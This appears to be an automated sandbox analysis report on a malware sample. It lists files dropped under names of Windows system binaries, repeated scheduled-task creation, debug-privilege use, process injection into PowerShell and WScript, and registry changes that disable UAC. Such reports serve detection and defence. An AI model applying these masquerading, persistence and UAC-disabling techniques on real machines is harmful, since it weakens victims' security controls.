File created C:\Windows\Media\Festival\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Media\Festival\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Offline Web Pages\RCX206F.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\security\templates\RCX267A.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\security\templates\csrss.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 1664 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 1664 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 2680 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2680 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2680 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2680 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2680 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2680 wrote to memory of 2844 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2844 wrote to memory of 2924 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2844 wrote to memory of 2924 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2844 wrote to memory of 2924 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2844 wrote to memory of 2912 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2844 wrote to memory of 2912 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2844 wrote to memory of 2912 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2924 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2924 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2924 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 1804 wrote to memory of 2284 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 1804 wrote to memory of 2284 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 1804 wrote to memory of 2284 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 1804 wrote to memory of 2188 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 1804 wrote to memory of 2188 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 1804 wrote to memory of 2188 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe
PID 2284 wrote to memory of 988 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2284 wrote to memory of 988 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 2284 wrote to memory of 988 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe
PID 988 wrote to memory of 1736 N/A C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A
